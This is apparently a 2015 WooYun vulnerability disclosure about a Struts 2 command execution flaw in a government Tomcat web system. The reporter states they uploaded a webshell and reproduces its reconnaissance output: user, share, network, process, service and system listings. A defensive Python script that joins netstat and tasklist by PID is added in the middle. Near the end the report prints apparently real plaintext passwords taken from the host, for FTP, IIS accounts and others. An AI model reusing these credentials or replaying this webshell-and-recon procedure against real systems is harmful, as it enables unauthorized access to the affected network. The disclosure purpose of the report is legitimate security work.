WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2015-11-10: Details reported to the vendor, awaiting the vendor's response
2015-11-20: Vendor confirmed; details disclosed to the vendor only
2015-11-30: Details disclosed to core whitehats and domain experts
2015-12-10: Details disclosed to regular whitehats
2015-12-20: Details disclosed to intern whitehats
2016-01-11: Details disclosed to the public
System address: **.**.**.**:8080/fvis/
Vulnerable URL: **.**.**.**:8080/fvis/modules/test-results-public!toFindByPage.action has a command execution vulnerability (the `action!method.action` form of the URL is Struts 2 dynamic method invocation syntax).
Uploaded a webshell directly to the server. Output of the commands run through it (addresses are masked as **.**.**.** in the original):
[*] Drive list [ A:C:D:E:F: ]

E:\apache-tomcat-6.0.30_Chuanbo\webapps\fvis\fvis\> net user

User accounts for \\PTHYZFZD-153

-------------------------------------------------------------------------------
ASPNET                   Guest                    IUSER_FLV
IUSR_COPY-40G            IWAM_COPY-40G            IWAM_FLV
ptnmc                    SUPPORT_388945a0
The command completed successfully.
The system cannot find the path specified.

E:\apache-tomcat-6.0.30_Chuanbo\bin\> net share
The service name is invalid.
More help is available by typing NET HELPMSG 2185.

E:\apache-tomcat-6.0.30_Chuanbo\bin\> net view
Server Name            Remark
-------------------------------------------------------------------------------
\\3G0594NEW
\\COPY-120G            PTDX-AQYPTDXWEB
\\CPZX44
\\CPZXDSFDB
\\CXQJYJ-01
\\JSJXXY
\\JSJXXY172
\\JW-LC-1
\\MZDBA                liup32
\\MZWBAJYJ
\\PIC-845D7259091
\\PTCPZXLM
\\PTCZ
\\PTDX-704EFFCBCD
\\PTDX-947470F60D
\\PTDX-AQYPTQYWEB      PTDX-AQYPTQYWEB
\\PTDX-CPZX-45
\\PTDX-DF6A9F2678
\\PTDX-XUNI11
\\PTDX-XYW
\\PTDXQYXXHB
\\PTKHFWBWMJK68
\\PTLDJ
\\PTWBDB
\\PTXYJW
\\SHUILIJU-8C7E67
\\XYQJYJ
\\YQJK28
The command completed successfully.

E:\apache-tomcat-6.0.30_Chuanbo\bin\> netstat -ano

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    **.**.**.**:21         **.**.**.**:0          LISTENING       1144
  TCP    **.**.**.**:135        **.**.**.**:0          LISTENING       784
  TCP    **.**.**.**:445        **.**.**.**:0          LISTENING       4
  TCP    **.**.**.**:801        **.**.**.**:0          LISTENING       4
  TCP    **.**.**.**:1025       **.**.**.**:0          LISTENING       504
  TCP    **.**.**.**:1521       **.**.**.**:0          LISTENING       1464
  TCP    **.**.**.**:5560       **.**.**.**:0          LISTENING       1484
  TCP    **.**.**.**:5580       **.**.**.**:0          LISTENING       1484
  TCP    **.**.**.**:8009       **.**.**.**:0          LISTENING       3960
  TCP    **.**.**.**:8080       **.**.**.**:0          LISTENING       3960
  TCP    **.**.**.**:13250      **.**.**.**:0          LISTENING       1560
  TCP    **.**.**.**:1028       **.**.**.**:0          LISTENING       1464
  TCP    **.**.**.**:1033       **.**.**.**:0          LISTENING       2284
  TCP    **.**.**.**:8005       **.**.**.**:0          LISTENING       3960
  TCP    **.**.**.**:9089       **.**.**.**:0          LISTENING       1644
  TCP    **.**.**.**:14147      **.**.**.**:0          LISTENING       1144
  TCP    **.**.**.**:139        **.**.**.**:0          LISTENING       4
  TCP    **.**.**.**:1505       **.**.**.**:1521       ESTABLISHED     1000
  TCP    **.**.**.**:1526       **.**.**.**:1521       ESTABLISHED     1000
  TCP    **.**.**.**:4929       **.**.**.**:1521       ESTABLISHED     3960
  TCP    **.**.**.**:4930       **.**.**.**:1521       ESTABLISHED     3960
  TCP    **.**.**.**:4931       **.**.**.**:1521       ESTABLISHED     3960
  TCP    **.**.**.**:4932       **.**.**.**:1521       ESTABLISHED     3960
  TCP    **.**.**.**:4939       **.**.**.**:139        TIME_WAIT       0
  TCP    **.**.**.**:8080       **.**.**.**:41515      TIME_WAIT       0
  TCP    **.**.**.**:8080       **.**.**.**:41566      TIME_WAIT       0
  TCP    **.**.**.**:8080       **.**.**.**:41582      TIME_WAIT       0
  TCP    **.**.**.**:8080       **.**.**.**:41590      ESTABLISHED     3960
  UDP    **.**.**.**:161        *:*                                    1544
  UDP    **.**.**.**:445        *:*                                    4
  UDP    **.**.**.**:2426       *:*                                    33564
  UDP    **.**.**.**:2428       *:*                                    33564
  UDP    **.**.**.**:2572       *:*                                    33564
  UDP    **.**.**.**:4116       *:*                                    33564
  UDP    **.**.**.**:123        *:*                                    1988
  UDP    **.**.**.**:1515       *:*                                    1000
  UDP    **.**.**.**:123        *:*                                    1988
  UDP    **.**.**.**:137        *:*                                    4
  UDP    **.**.**.**:138        *:*                                    4

E:\apache-tomcat-6.0.30_Chuanbo\bin\> tasklist /svc

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       372 N/A
csrss.exe                      420 N/A
winlogon.exe                   444 N/A
services.exe                   492 Eventlog, PlugPlay
lsass.exe                      504 HTTPFilter, ProtectedStorage, SamSs
vmacthlp.exe                   684 VMware Physical Disk Helper Service
svchost.exe                    716 DcomLaunch
svchost.exe                    784 RpcSs
360rps.exe                     840 360rp
svchost.exe                    900 Dnscache
ZhuDongFangYu.exe              912 ZhuDongFangYu
svchost.exe                    980 AeLookupSvc, AudioSrv, CryptSvc, dmserver,
                                   EventSystem, lanmanworkstation, Netman, Nla,
                                   SENS, SharedAccess, winmgmt
FileZilla Server.exe          1144 FileZilla Server
GuardService.exe              1168 GuardForClient
inetinfo.exe                  1260 IISADMIN
iptablex.exe                  1296 IptabLex Services
isqlplussvc.exe               1368 OracleOraDb10g_home1iSQL*Plus
TNSLSNR.EXE                   1464 OracleOraDb10g_home1TNSListener
java.exe                      1484 N/A
oracle.exe                    1496 OracleServiceORCL
snmp.exe                      1544 SNMP
svchost.exe                   1560 TermService
VMwareService.exe             1588 VMTools
vmware-converter-a.exe        1644 vmware-converter-agent
vmware-converter.exe          1964 vmware-converter-server
svchost.exe                   1988 W32Time
searchindexer.exe              208 WSearch
svchost.exe                    412 W3SVC
dllhost.exe                   2096 COMSysApp
msdtc.exe                     2208 MSDTC
alg.exe                       2284 ALG
csrss.exe                     2412 N/A
winlogon.exe                  2440 N/A
rdpclip.exe                   2748 N/A
ctfmon.exe                    2844 N/A
explorer.exe                  2852 N/A
wmiprvse.exe                  2932 N/A
VMwareTray.exe                3076 N/A
VMwareUser.exe                3088 N/A
SecCopy.exe                   3128 N/A
360sd.exe                     3136 N/A
soffice.exe                   3240 N/A
soffice.bin                   3256 N/A
mmc.exe                       3380 N/A
logon.scr                     1428 N/A
conime.exe                    2992 N/A
java.exe                      3960 N/A
plsqldev.exe                  1000 N/A
notepad.exe                   1272 N/A
360leakfixer.exe              1364 N/A
360rp.exe                    33564 N/A
iptablex.exe                 46868 N/A
CWebManagerCli.exe           47236 ClientForWebManager
CInfoservice.exe             44336 WebInfoServriceCli
cmd.exe                      48960 N/A
tasklist.exe                 47668 N/A
wmiprvse.exe                 41548 N/A

E:\apache-tomcat-6.0.30_Chuanbo\bin\> net start
These Windows services are started:

   360 杀毒实时防护加载服务
   Application Experience Lookup Service
   Application Layer Gateway Service
   COM+ Event System
   COM+ System Application
   Cryptographic Services
   DCOM Server Process Launcher
   Distributed Transaction Coordinator
   DNS Client
   Event Log
   FileZilla Server FTP server
   GuardServrice
   HTTP SSL
   IIS Admin Service
   IptabLex Services
   Logical Disk Manager
   Network Connections
   Network Location Awareness (NLA)
   OracleOraDb10g_home1iSQL*Plus
   OracleOraDb10g_home1TNSListener
   OracleServiceORCL
   Plug and Play
   Protected Storage
   Remote Procedure Call (RPC)
   Security Accounts Manager
   Site Manager Client Servrice
   SNMP Service
   System Event Notification
   Terminal Services
   VMware Physical Disk Helper Service
   VMware Tools Service
   VMware vCenter Converter Agent
   VMware vCenter Converter Server
   WebServer Infomation Service Client
   Windows Audio
   Windows Firewall/Internet Connection Sharing (ICS)
   Windows Management Instrumentation
   Windows Search
   Windows Time
   Workstation
   World Wide Web Publishing Service
   主动防御

The command completed successfully.

E:\apache-tomcat-6.0.30_Chuanbo\bin\> ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : pthyzfzd-153
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter 本地连接:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
   Physical Address. . . . . . . . . : 00-50-56-9E-6F-B0
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : **.**.**.**
   Subnet Mask . . . . . . . . . . . : **.**.**.**
   Default Gateway . . . . . . . . . : **.**.**.**
   DNS Servers . . . . . . . . . . . : **.**.**.**
                                       **.**.**.**

E:\apache-tomcat-6.0.30_Chuanbo\bin\> systeminfo

Host Name:                 PTHYZFZD-153
OS Name:                   Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          ptidc
Registered Organization:   ptgov
Product ID:                69813-640-8769354-45542
Original Install Date:     2011-3-18, 15:02:50
System Up Time:            145 Days, 0 Hours, 29 Mins, 10 Secs
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 6 Model 46 Stepping 8 GenuineIntel ~1863 Mhz
BIOS Version:              PTLTD - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             zh-cn;Chinese (China)
Input Locale:              zh-cn;Chinese (China)
Time Zone:                 (GMT+08:00) Beijing, Chongqing, Hong Kong SAR, Urumqi
Total Physical Memory:     1,023 MB
Available Physical Memory: 258 MB
Page File: Max Size:       2,287 MB
Page File: Available:      427 MB
Page File: In Use:         1,860 MB
Page File Location:        c:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\PTHYZFZD-153
Hotfix(s):                 610 Hotfix(s) Installed.
                           [01] to [296]: File 1 (296 identical entries)
                           [297]: Q147222
                           [298]: KB2416451 - Q
Network Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: 本地连接
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: **.**.**.**

E:\apache-tomcat-6.0.30_Chuanbo\bin\>
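The quickest way to read the `netstat -ano` and `tasklist /svc` listings above together is to join them on the PID column, so every listening port is attributed to an image name and, where one exists, a Windows service; ports owned by a process with no service (Tomcat's java.exe here, or 360rp.exe) do not appear in `net start` and have to be explained by hand. The following is an added Python example written for this page, not code from the original report. Its sample input is a constructed subset of the report's own output, with the masked addresses replaced by TEST-NET placeholders (192.0.2.x, 203.0.113.x), which are assumptions.

```python
"""Join `netstat -ano` listeners with `tasklist /svc` by PID.

Added example; not part of the original report. Sample output below is a
constructed subset of the report's listing, with the masked addresses
replaced by TEST-NET placeholders (an assumption).
"""
import re

# Constructed sample: subset of the report's `netstat -ano` output.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.0.2.10:21          0.0.0.0:0              LISTENING       1144
  TCP    192.0.2.10:1521        0.0.0.0:0              LISTENING       1464
  TCP    192.0.2.10:8009        0.0.0.0:0              LISTENING       3960
  TCP    192.0.2.10:8080        0.0.0.0:0              LISTENING       3960
  TCP    192.0.2.10:4929        192.0.2.20:1521        ESTABLISHED     3960
  TCP    192.0.2.10:8080        203.0.113.7:41590      ESTABLISHED     3960
  UDP    192.0.2.10:161         *:*                                    1544
  UDP    192.0.2.10:2426        *:*                                    33564
"""

# Constructed sample: subset of the report's `tasklist /svc` output.
TASKLIST_SAMPLE = """\
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
FileZilla Server.exe          1144 FileZilla Server
TNSLSNR.EXE                   1464 OracleOraDb10g_home1TNSListener
snmp.exe                      1544 SNMP
java.exe                      3960 N/A
360rp.exe                    33564 N/A
"""

NO_SERVICE = {"N/A", "暂缺"}  # English and zh-CN tasklist placeholders
# Image names may contain spaces ("FileZilla Server.exe"), so match the
# PID as the first run of digits that is followed by the services column.
_TASK_RE = re.compile(r"^(\S.*?)\s+(\d+)\s+(.*?)\s*$")


def parse_netstat(text):
    """Return listening sockets as (proto, port, pid).

    TCP rows count only in LISTENING state; UDP rows have no state column,
    so every bound UDP socket is treated as a listener.
    """
    listeners = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local = parts[0], parts[1]
        port = int(local.rsplit(":", 1)[1])
        if proto == "TCP":
            state, pid = parts[3], int(parts[4])
            if state != "LISTENING":
                continue
        else:
            pid = int(parts[3])
        listeners.append((proto, port, pid))
    return listeners


def parse_tasklist(text):
    """Map PID -> (image name, [service names]) from `tasklist /svc`."""
    procs = {}
    for line in text.splitlines():
        m = _TASK_RE.match(line)
        if not m:
            continue  # header, separator and blank lines carry no PID
        image, pid, svc = m.group(1), int(m.group(2)), m.group(3)
        services = [] if svc in NO_SERVICE else [s.strip() for s in svc.split(",")]
        procs[pid] = (image, services)
    return procs


def join_listeners(netstat_text, tasklist_text):
    """Attribute every listening socket to its process and service."""
    procs = parse_tasklist(tasklist_text)
    rows = []
    for proto, port, pid in parse_netstat(netstat_text):
        image, services = procs.get(pid, ("<unknown>", []))
        rows.append({"proto": proto, "port": port, "pid": pid,
                     "image": image, "services": services})
    return sorted(rows, key=lambda r: (r["port"], r["proto"]))


def unexplained_listeners(rows):
    """Listeners whose owning process is not registered as a service."""
    return [r for r in rows if not r["services"]]


def inbound_peers(netstat_text, port):
    """Foreign endpoints with an ESTABLISHED connection to a local port."""
    peers = set()
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[3] == "ESTABLISHED":
            if int(parts[1].rsplit(":", 1)[1]) == port:
                peers.add(parts[2])
    return peers


if __name__ == "__main__":
    for r in join_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        svc = ", ".join(r["services"]) or "-"
        print(f"{r['proto']:<4} {r['port']:>6} {r['pid']:>6} {r['image']:<22} {svc}")
    print("connected to 8080:", inbound_peers(NETSTAT_SAMPLE, 8080))
```

Run against the full listing, `inbound_peers(text, 8080)` is also how a responder picks out the source address of the shell session itself: in the report the only ESTABLISHED peer on 8080 belongs to the Tomcat PID 3960 that served the vulnerable action.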
Credentials found on the host (reproduced as in the original, masked values shown as **.**.**.**):

ftpyonghuftp!103pt
Login software password : system password
**.**.**.**/**.**.**.**, **.**.**.**/**.**.**.**, **.**.**.**/**.**.**.**, **.**.**.**/**.**.**.**, **.**.**.**/**.**.**.**, **.**.**.**/**.**.**.**, **.**.**.**/**.**.**.**
IUSER_FLV  cai!TC528$bin520!26ASDF
IWAM_FLV   cai!TC528$bin520!62ZXCV
pt351100!
Severity: High
Vulnerability Rank: 13
Confirmed: 2015-11-20 15:36
CNVD confirmed and reproduced the reported vulnerability; it has been passed through CNCERT to the Fujian branch, which will coordinate remediation with the unit operating the site.
None yet.